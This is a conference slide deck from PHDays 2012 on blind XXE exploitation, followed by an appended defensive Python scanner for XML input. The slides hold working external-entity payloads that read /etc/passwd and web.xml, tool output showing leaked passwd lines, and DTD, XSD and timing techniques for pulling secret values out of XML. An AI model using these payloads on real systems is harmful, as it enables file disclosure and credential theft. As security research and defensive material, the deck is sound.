ONsec PHDays 2012 XXE incapsulated report


PHDays report. Attacks on MS clients and blind XXE exploitation, encapsulated report. D0znpp. ONsec


  1. Attacks against Microsoft network web clients. PHDays, Russia, Moscow, 31/05/2012
  2. Author bio: @d0znpp, d0znpp@onsec.ru
     • Engaged in research in the field of web application security (since 2004)
     • Founder and security expert of the ONsec company (since 2009)
     • Nowadays: development of self-learning systems for the detection of attacks on web applications and heuristic analysis
  3. MS network under attack
     • Trusted domain
     • Same Origin Policy on trusted domain
     • Local network area
     • Security policy
     • Bypass "no-proxy for local addresses"
     • Profit
  4. Blind XXE exploitation. PHDays, Russia, Moscow, 31/05/2012
  5. Good morning. Wake up, 0day. PostgreSQL, all versions (8.4.11 debian 4.4.5-8 tested):
        xmlparse(document '<!DOCTYPE c [ <!ENTITY a SYSTEM "">]><c>&a</c>');
  6. Good morning. Wake up, 0day. PostgreSQL, all versions (8.4.11 debian 4.4.5-8 tested). No way to read content from the entity, but...
        ERROR: invalid XML document
        ПОДРОБНО: parser error : StartTag: invalid element name
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x
        ^
        parser error : AttValue: " or ' expected
        <img src=http://seclog.ru/main/logo.php width=0 height=0/>
  7. XXE basics. Parser bug (feature):
     • To read local files
     • To make DoS (by reading /dev/zero loops)
        <?xml encoding="utf-8" ?><!DOCTYPE a [<!ENTITY e SYSTEM "/etc/passwd"> ]><a>&e;</a>
  8. XXE applications
     • Local files
     • Internal network resources
     • Port scan
     • MS Windows network resources (adC$)
     • Wrappers (ldap:// in perl, expect://, ssh2:// etc.)
  9. Classic XXE vuln
     • Based on web application error messages, such as: "Unknown language DATA", "Login DATA are not valid", "Password for user DATA does not match"
     • Cannot read files containing characters that are not valid in XML, such as 0x02, <, > etc.
  10. Vuln which won a "Month of Yandex bugs hunting" contest
        $ ./xxe-direct.pl --file="/etc/passwd"
        <?xml version="1.0" encoding="UTF-8"?>
        <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:namesp2="http://namespaces.soaplite.com/perl" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:namesp84="http://xml.apache.org/xml-soap" xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body><SOAP-ENV:Fault>
        <faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode>
        <faultstring xsi:type="xsd:string">Unknown language</faultstring>
        <detail xsi:type="xsd:string">Unknown language
        root:x:0:0:root:/root:/bin/bash
        daemon:x:1:1:daemon:/usr/sbin:/bin/sh
        bin:x:2:2:bin:/bin:/bin/sh
        sys:x:3:3:sys:/dev:/bin/sh
        sync:x:4:65534:sync:/bin:/bin/sync
        games:x:5:60:games:/usr/games:/bin/sh
  11. What is wrong?
     • The webapp may not display error messages
     • You may want to get XML file contents in Java. Interesting XMLs: web.xml, tomcat-users.xml, jetty.xml, httpd.conf (malformed)
  12. PHP way to read anything
     • The PHP wrapper provides a filter function: php://filter/convert.base64-encode/resource=web.xml
     • Then you still need error messages to be displayed
  13. What is blind?
     • Use DTD and XSD validations
     • Get a validation result (status or errors)
     • Use bruteforce, regexp, binary search and error message information (error-based) to read the external XML structure and data
  14. DTD based attack formula
        XMLinp = DTDint + XMLint + XMLext
        V(XMLinp, DTDint) = V(XMLint, DTDint) && V(XMLext, DTDint)
     where XMLinp is the input XML stream, DTDint the internal DTD schema, XMLint the internal XML structure, XMLext the external XML (the XML to read), and V(xml, schema) the validation function, which returns a validation status (error message or boolean).
  15. DTD based attack: from idea to schema
     Web.xml:
        <?xml version="1.0"?>
        <secret>
          <any>
            data
          </any>
        </secret>
     Input.xml:
        <?xml version="1.0" ?>
        <!ENTITY ext SYSTEM "web.xml">
        <!ELEMENT root (secret+)>
        <!ELEMENT secret (any+)>
        <!ELEMENT any (#PCDATA)>
        <root>
          &ext;
          <secret><any>data</any></secret>
        </root>
     Result: XML validation error
  16. Example #1. Read attribute value
        <!ATTLIST key id (a|b) #REQUIRED>
        <key id="secret"></key>
        Value "secret" for attribute id of mountain is not among the enumerated set  //LibXML
        Attribute "key" with value "secret" must have a value from the list "a b ".  //Xerces
  17. Example #2. Brute external XML tag
        <!ENTITY a SYSTEM "web.xml">
        <!ELEMENT ext (root+)>
        ]>
        <ext>&a;</ext>   --> OK
        <!ENTITY a SYSTEM "web.xml">
        <!ELEMENT ext (foobar+)>
        ]>
        <ext>&a;</ext>   --> Element ext content does not follow the DTD, expecting (root)+, got (CDATA )  //LibXML PHP
  18. Example #3. Read external XML (Java)
        factory.setValidating(true); // SAXParserFactory or DocumentBuilderFactory
        <!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM 'web.xml'>]><root>&a;</root>
        Element type "bar" must be declared.
     Where is the "bar" tag? "bar" is in web.xml!
  19. Problems of DTD based attacks
     • Example #3 doesn't work in LibXML PHP ;( Only the first tag name can be read (Example #2) from a DOM object in PHP (library bug).
     • DTD can't be used to determine tag values (only tag names, document structure and attribute values)
     • Bruteforce is required if errors are not displayed
     • Malformed XML such as httpd.conf can't be read
  20. XSD based attack formula
        XMLinp = DTDinp + XSDinp + XMLint + XMLext
        V(XMLinp, DTDinp, XSDinp) = V(XMLint, DTDinp, XSDinp) && V(XMLext, DTDinp, XSDinp)
     where XMLinp is the input XML stream, DTDinp the input DTD schema, XSDinp the input XSD schema, XMLint the internal XML structure, XMLext the external XML (the XML to read), and V(xml, dtd, xsd) the validation function, which returns a validation status (error message or boolean).
  21. XSD based attack: from idea to schema
     Web.xml:
        <?xml version="1.0"?>
        <secret>
          <any>
            data
          </any>
        </secret>
     Input.xml:
        <?xml version="1.0" ?>
        <!ENTITY ext SYSTEM "web.xml">
        <root xsi:noNamespaceSchemaLocation="http://myhost/int.xsd">
          &ext;
          <secret><any>data</any></secret>
        </root>
     Result: XML validation error
  22. Example #4. Read tag values (XSD)
        parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage", "http://www.w3.org/2001/XMLSchema"); // SAXParserFactory or DocumentBuilderFactory
        <!ENTITY ext SYSTEM "web.xml">
        <contacts xsi:noNamespaceSchemaLocation="int.xsd">
        <xs:element name="password" type="xs:int"/>
        cvc-datatype-valid.1.2.1: 'Secret' is not a valid value for 'integer'.
        cvc-type.3.1.3: The value 'Secret' of element 'password' is not valid.  //Xerces
  23. Binary search basics: a-n? m-z? a-h? a-e? h-n?
  24. Faster binary search
     • Phonetic chains
     • Probability with which one letter follows another one
     • Based on phonetic features of languages
     • Can be used to make text reading by binary search faster: http://exploit-db.com/papers/13969/
  25. Example #5. Binary search for tag value (XSD)
        <xs:element name="password" type="PWD"/>
        …
        <xs:simpleType name="PWD">
          <xs:restriction base="xs:token">
            <xs:pattern value="[a-m]{1}[a-z]+"/>
          </xs:restriction>
        </xs:simpleType>
     If the first character of the password tag value is between "a" and "m", validation succeeds; otherwise it fails.
  26. And what about attacks without a validation status?
     • Use something like time-based attacks!
     • An XSD parser validates all tags, even when some of them are already invalid
     • Parser != Interpreter
     • What can we do in that case?
  27. Example #6. 2blind attacks
        <xs:element name="secret">
          <xs:complexType>
            <xs:choice>
              <xs:group ref="conditionGrp"/>
              <xs:group ref="highloadGrp"/>
            </xs:choice>
          </xs:complexType>
        </xs:element>
     If the value of the secret tag matches conditionGrp, the parser doesn't execute the regexp from highloadGrp. So make the highloadGrp regexp really difficult ;)
  28. Problems of XSD based attacks
     • Internal XSD validation is rare in the wild
     • Only 4% of all webapps with XXE vulns do that*
     • Cannot be used to read malformed XML, such as httpd.conf
     * By our stats from security audits since 2009
  29. ??? PHDays, Russia, Moscow, 31/05/2012. @d0znpp, d0znpp@onsec.ru
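Every technique in slides 7 and 14-28 needs the parser to declare and resolve an external entity (the `&ext;` that pulls web.xml in) and, for the DTD variants, to accept an attacker-supplied DOCTYPE. The check below is an added example, not code from the deck or from ONsec: a stdlib-only pre-parse scan that records every external DTD or SYSTEM/PUBLIC entity, refuses to load any of them, and by default rejects documents carrying a DOCTYPE at all. The function and class names (`scan_untrusted_xml`, `XmlScan`) and the sample inputs are mine.

```python
import xml.parsers.expat as expat
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

@dataclass
class XmlScan:
    accepted: bool
    has_doctype: bool = False
    externals: List[Tuple[str, str]] = field(default_factory=list)  # (name, URI)
    error: Optional[str] = None

def scan_untrusted_xml(data: bytes, allow_doctype: bool = False) -> XmlScan:
    """Parse with expat but never fetch anything: external DTDs and SYSTEM/PUBLIC
    entities are recorded and the document refused. With allow_doctype=False (the
    usual hardening) any DOCTYPE is refused, which also removes the DTD oracle."""
    result = XmlScan(accepted=True)
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        result.has_doctype = True
        if sysid or pubid:  # <!DOCTYPE a SYSTEM "http://.../a.dtd">
            result.externals.append(("<!DOCTYPE>", sysid or pubid))

    def on_entity_decl(name, is_pe, value, base, sysid, pubid, notation):
        if sysid is not None or pubid is not None:  # <!ENTITY e SYSTEM "...">
            result.externals.append((name, sysid or pubid))

    def on_external_ref(context, base, sysid, pubid):
        return 0  # 0 makes expat abort instead of loading the resource

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        result.accepted = False
        result.error = str(exc)
    if result.externals or (result.has_doctype and not allow_doctype):
        result.accepted = False
    return result

# Constructed inputs: the deck's slide-7 payload (quotes restored) and a clean document.
XXE_PAYLOAD = b'<?xml version="1.0"?><!DOCTYPE a [<!ENTITY e SYSTEM "/etc/passwd">]><a>&e;</a>'
CLEAN_DOC = b'<root><secret><any>data</any></secret></root>'

if __name__ == "__main__":
    for doc in (XXE_PAYLOAD, CLEAN_DOC):
        print(scan_untrusted_xml(doc))
```

The scan does not cover a schema the application itself loads from an attacker-controlled `xsi:noNamespaceSchemaLocation` (slide 21); that URL must additionally be ignored or pinned by the validator configuration.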